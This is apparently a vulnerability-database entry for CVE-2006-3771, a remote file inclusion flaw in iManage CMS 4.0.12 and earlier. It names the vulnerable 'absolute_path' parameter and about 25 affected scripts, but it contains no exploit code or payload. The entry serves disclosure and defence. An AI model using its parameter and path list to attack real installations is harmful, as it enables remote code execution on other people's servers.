CVE-2006-3771
iManage CMS < 4.0.12 - Remote File Inclusion via absolute_path Parameter
Title source: llmExploitation Summary
EIP tracks 1 public exploit for CVE-2006-3771. PoCs published by Matdhule.
AI-analyzed exploit summary This exploit demonstrates a remote file inclusion vulnerability in iManage CMS <= 4.0.12 due to improper verification of the 'absolute_path' parameter. It allows arbitrary PHP code execution by including files from external resources.
Description
Multiple PHP remote file inclusion vulnerabilities in component.php in iManage CMS 4.0.12 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php, and other unspecified files.
Exploits (1)
This exploit demonstrates a remote file inclusion vulnerability in iManage CMS <= 4.0.12 due to improper verification of the 'absolute_path' parameter. It allows arbitrary PHP code execution by including files from external resources.